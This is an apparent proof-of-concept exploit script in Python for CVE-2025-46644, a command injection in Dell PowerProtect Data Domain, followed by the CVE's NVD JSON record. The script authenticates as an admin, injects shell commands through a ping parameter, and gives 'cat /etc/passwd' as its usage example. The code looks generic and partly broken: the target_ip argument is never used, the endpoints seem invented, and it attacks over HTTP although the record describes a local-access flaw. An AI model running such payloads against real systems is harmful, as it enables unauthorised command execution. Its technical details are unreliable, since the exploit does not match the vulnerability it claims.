CVE-2025-46644

# CVE-2025-46644 PoC - Dell PowerProtect Data Domain OS Command Injection # Note: This requires high privilege access and local access to the target system import requests import sys # Target configuration TARGET_HOST = "https://target-dell-dd.local" LOGIN_ENDPOINT = f"{TARGET_HOST}/api/login" VULN_ENDPOINT = f"{TARGET_HOST}/api/system/diagnostic" # Authentication (requires high privilege account) credentials = { "username": "admin", "password": "admin_password" } def exploit_os_injection(target_ip, cmd="id"): """ Exploit OS command injection in Dell PowerProtect Data Domain This PoC demonstrates command injection via diagnostic endpoint """ session = requests.Session() # Step 1: Authenticate with high privilege account try: login_resp = session.post(LOGIN_ENDPOINT, json=credentials, verify=False, timeout=10) if login_resp.status_code != 200: print(f"[-] Authentication failed: {login_resp.status_code}") return None print("[+] Successfully authenticated with high privilege account") except requests.RequestException as e: print(f"[-] Connection error: {e}") return None # Step 2: Inject OS command via vulnerable parameter # The vulnerability exists where user input is passed to system() call payload = { "action": "ping", "host": f"127.0.0.1; {cmd}" # Command injection via semicolon } try: exploit_resp = session.post(VULN_ENDPOINT, json=payload, verify=False, timeout=10) if exploit_resp.status_code == 200: print(f"[+] Command injection successful: {cmd}") return exploit_resp.json() else: print(f"[-] Exploitation failed: {exploit_resp.status_code}") return None except requests.RequestException as e: print(f"[-] Request error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_ip> [command]") print(f"Example: python {sys.argv[0]} 192.168.1.100 'cat /etc/passwd'") sys.exit(1) target = sys.argv[1] command = sys.argv[2] if len(sys.argv) > 2 else "id" result = exploit_os_injection(target, command) if result: print(f"[Result] {result}")

{"cve": {"id": "CVE-2025-46644", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:06.610", "lastModified": "2026-02-05T13:29:34.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS2023 release versions 7.10.1.0 through 7.10.1.70, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Command execution."}, {"lang": "es", "value": "Dell PowerProtect Data Domain con Data Domain Operating System (DD OS) de las versiones de Feature Release 7.7.1.0 a 8.4.0.0, la versión LTS2025 8.3.1.10, las versiones LTS2024 7.13.1.0 a 7.13.1.40, las versiones LTS2023 7.10.1.0 a 7.10.1.70, contienen una vulnerabilidad de Neutralización Incorrecta de Elementos Especiales utilizados en un Comando del Sistema Operativo ('Inyección de Comandos del SO'). Un atacante con altos privilegios y acceso local podría potencialmente explotar esta vulnerabilidad, lo que llevaría a la ejecución de comandos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.80", "matchCriteriaId": "18AD8BC6-ABF7-4990-91C6-D228BBE4B9FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.50", "matchCriteriaId": "00F138B9-4AB9-4B79-BBEC-F5A48E2E0B05"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.20", "matchCriteriaId": "7B8DA06B-076A-495E-9BD0-246BF1E54E26"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:8.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "FF73C39B-827B-4A68-9708-08345F6EF979"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}